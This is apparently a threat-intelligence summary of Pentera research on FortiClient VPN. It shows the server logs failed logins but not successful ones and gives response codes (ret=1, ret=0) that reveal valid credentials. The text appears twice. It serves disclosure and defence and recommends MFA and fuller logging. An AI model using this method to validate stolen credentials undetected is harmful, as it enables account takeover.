Forti-fied? Logging Blind Spot Revealed in FortiClient VPN
Summary:
While creating an automatic credential validation system for Fortinet VPN, Pentera says it uncovered a bug that actors can exploit to potentially compromise the security of dozens of organizations. Initially, to automate the validation of credentials, Pentera attempted to use clients like OpenConnect to establish a connection, but this approach proved unreliable. This led them to further investigate the communication protocols between the client and the VPN server. Using Burp Suite to capture interactions, they found that a simple HTTPS request triggered the authentication attempt. In this case, the server’s response to this request could indicate whether the credentials were valid (successful login represented by ret=1), whether authentication failed (failed login represented by ret=0), or if the server had throttled attempts due to too many consecutive failures. This discovery allowed the researchers to refine their method for automating the credential validation process, relying on the server's response to differentiate between valid and invalid credentials. With this in mind, researchers then assessed how the method would impact incident response (IR) teams monitoring Fortinet VPNs. Initially, Pentera expected to see a lot of logs and alerts given the repeated multiple authentication attempts. However, upon logging into the VPN server, they uncovered an unexpected discovery. To their surprise, they found that the VPN server only logged failed login attempts and did not log successful authentication attempts. This means that if an attacker used the method uncovered by Pentera to validate credentials, the successful login would go undetected, leaving no trace of the attack.
Analyst Comments:
Pentera stresses that the lack of logging for successful authentication attempts at the authentication phase poses a significant security risk, as attackers can exploit this vulnerability to conduct brute-force attacks without detection. If actors have access to leaked credentials, they can quickly identify valid VPN users without triggering any alarms. In a properly configured system, successful logins after multiple failed attempts would prompt an Incident Response (IR) team to reset the user’s password. However, with no logs for successful attempts, the IR team may mistakenly assume the attack failed and overlook the compromised credentials, allowing attackers to later use the valid credentials, blend in with legitimate users, or sell them on the dark web.
Suggested Corrections:
Pentera says it shared this information with Fortinet. While the vendor did not classify it as a vulnerability, it did acknowledge the blind spot that it creates. Pentera has recommended that Fortinet improve its logging mechanisms to address this gap by ensuring that all authentication attempts, regardless of their outcome, are logged. This in turn would allow administrators to more effectively monitor and respond to suspicious activity.
In the meantime, Pentera recommends Fortinet VPN users implement additional security measures, such as multi-factor authentication (MFA) and strict monitoring of authentication logs, along with regular audits and updates to enhance defenses.
Link(s):
https://pentera.io/blog/FortiClient-VPN_logging-blind-spot-revealed/
While creating an automatic credential validation system for Fortinet VPN, Pentera says it uncovered a bug that actors can exploit to potentially compromise the security of dozens of organizations. Initially, to automate the validation of credentials, Pentera attempted to use clients like OpenConnect to establish a connection, but this approach proved unreliable. This led them to further investigate the communication protocols between the client and the VPN server. Using Burp Suite to capture interactions, they found that a simple HTTPS request triggered the authentication attempt. In this case, the server’s response to this request could indicate whether the credentials were valid (successful login represented by ret=1), whether authentication failed (failed login represented by ret=0), or if the server had throttled attempts due to too many consecutive failures. This discovery allowed the researchers to refine their method for automating the credential validation process, relying on the server's response to differentiate between valid and invalid credentials. With this in mind, researchers then assessed how the method would impact incident response (IR) teams monitoring Fortinet VPNs. Initially, Pentera expected to see a lot of logs and alerts given the repeated multiple authentication attempts. However, upon logging into the VPN server, they uncovered an unexpected discovery. To their surprise, they found that the VPN server only logged failed login attempts and did not log successful authentication attempts. This means that if an attacker used the method uncovered by Pentera to validate credentials, the successful login would go undetected, leaving no trace of the attack.
Analyst Comments:
Pentera stresses that the lack of logging for successful authentication attempts at the authentication phase poses a significant security risk, as attackers can exploit this vulnerability to conduct brute-force attacks without detection. If actors have access to leaked credentials, they can quickly identify valid VPN users without triggering any alarms. In a properly configured system, successful logins after multiple failed attempts would prompt an Incident Response (IR) team to reset the user’s password. However, with no logs for successful attempts, the IR team may mistakenly assume the attack failed and overlook the compromised credentials, allowing attackers to later use the valid credentials, blend in with legitimate users, or sell them on the dark web.
Suggested Corrections:
Pentera says it shared this information with Fortinet. While the vendor did not classify it as a vulnerability, it did acknowledge the blind spot that it creates. Pentera has recommended that Fortinet improve its logging mechanisms to address this gap by ensuring that all authentication attempts, regardless of their outcome, are logged. This in turn would allow administrators to more effectively monitor and respond to suspicious activity.
In the meantime, Pentera recommends Fortinet VPN users implement additional security measures, such as multi-factor authentication (MFA) and strict monitoring of authentication logs, along with regular audits and updates to enhance defenses.
Link(s):
https://pentera.io/blog/FortiClient-VPN_logging-blind-spot-revealed/